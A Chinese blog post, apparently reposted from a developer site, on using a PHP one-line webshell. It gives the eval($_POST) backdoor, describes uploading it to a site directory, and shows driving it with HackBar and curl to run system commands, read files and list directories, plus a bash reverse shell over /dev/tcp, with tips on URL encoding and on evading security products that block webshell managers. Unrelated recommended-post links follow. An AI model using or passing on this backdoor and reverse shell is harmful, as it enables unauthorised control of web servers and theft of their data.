PHP一句话木马使用技巧

PHP一句话木马使用技巧近来发现好多网站有安全狗,会拦截菜刀和蚁剑,因此总结下通过浏览器直接调用一句话木马的姿势。PHP一句话:<?php@eval($_POST[‘shy’]);?>firefox浏览器:hackbar命令提示符:curl首先上传一句话木马到网站目录,可以是虚拟机也可以是VPS,我这里用的是阿里云我自己搭建的网站,由于只是简单的一句话木马,因次一上车就收到了安全云的短信…

大家好,又见面了,我是你们的朋友全栈君。

近来发现好多网站有安全狗,会拦截菜刀和蚁剑,因此总结下通过浏览器直接调用一句话木马的姿势。

PHP一句话:<?php @eval($_POST[‘shy’]);?>

firefox浏览器:hackbar

命令提示符:curl

首先上传一句话木马到网站目录,可以是虚拟机也可以是VPS,我这里用的是阿里云我自己搭建的网站,

由于只是简单的一句话木马,因次一上车就收到了安全云的短信安全提示,正好可以用来测试免杀一句话,免得以后测试刚上传就被发现了。

利用hackbar链接木马

利用system();执行系统命令

PHP一句话木马使用技巧

PHP一句话木马使用技巧

利用file_get_contents进行文件读取,然后用echo,或print打印出这个字符串。file_get_contents是将文件内容读入到一个字符串当中。

PHP一句话木马使用技巧

PHP一句话木马使用技巧

file_get_contents还可以替换成其他的函数

反弹shell,最重要的是记得进行url编码,不然会失败的

反射shell的语句有很多,这里是用的是最简单的bash -i >& /dev/tcp/ip/post  0>&1

PHP一句话木马使用技巧

PHP一句话木马使用技巧

利用curl链接一句话木马

基本上跟上面一样,curl参数-X post 指定http方法为post  –data 后面跟post的内容

PHP一句话木马使用技巧

 

scandir() 函数返回指定目录中的文件和目录的数组

PHP一句话木马使用技巧

PHP一句话木马使用技巧

PHP一句话木马使用技巧

反弹shell,也要经过编码才能反弹成功

PHP一句话木马使用技巧

总之,编码真的很重要。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/143646.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 用c#实现简单的登录和注册功能

    用c#实现简单的登录和注册功能这两天c#大作业要求做一个简单的通讯录系统,我就先做了登录和注册的功能,在网上看了一些代码,自己再做,终于做出来了。做的不是很美观,但是可以简单实现。首先用sqlserver建表。我建了一个名为user_info的表,添加username和passdword两个字段。创建登录页面,改了一些控件的名称,效果如下图:登录界面代码如下:privatevoidbtn_Login…

    2022年8月22日
    3
  • kettle使用教程(超详细)

    kettle使用教程(超详细)今天详细详细说一下kettle的安装,安装的版本:jdk:jdk-8u152-windows–x64kettle:KETTLE-5.4一、环境部署1、安装JDK,按默认值安装即可2、设置环境变量,如图下图具体步骤:1.右击我的电脑-属性-高级系统设置-环境变量-系统变量-新建2.变量名:JAVA_HOME3.变量值:JDK安装目录3、…

    2022年5月24日
    109
  • RDD — flatmap

    RDD — flatmapflatmapflatmap简单用法defmain(args:Array[String]):Unit={//设置log级别Logger.getLogger(“org”).setLevel(Level.WARN)valconf=newSparkConf().setAppName(“WordCountDemo”).setMaster(“loca…

    2022年5月7日
    46
  • idea2022.01.12密钥激活码[最新免费获取]

    (idea2022.01.12密钥激活码)最近有小伙伴私信我,问我这边有没有免费的intellijIdea的激活码,然后我将全栈君台教程分享给他了。激活成功之后他一直表示感谢,哈哈~IntelliJ2021最新激活注册码,破解教程可免费永久激活,亲测有效,下面是详细链接哦~https://javaforall.net/100143.html…

    2022年4月1日
    934
  • SQL的区别及注意事项

    SQL的区别及注意事项

    2021年7月20日
    58
  • 怎么让Linux发邮件? Linux怎么发email

    怎么让Linux发邮件? Linux怎么发email相比大家也想让自己的Linux备份啊什么的存储起来  放到哪里最安全呢 相比来说放到自己QQ邮箱比放到自己电脑更安全一些我们今天就来做一个实验让你的Linux发邮件到你的mail中我们今天需要一个软件(mailx)直接yum装即可:yuminstall-ymailx 然后我们创建一个隐藏文件类似.sh 随便一个就好 vi/email.sh然…

    2022年10月20日
    0

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号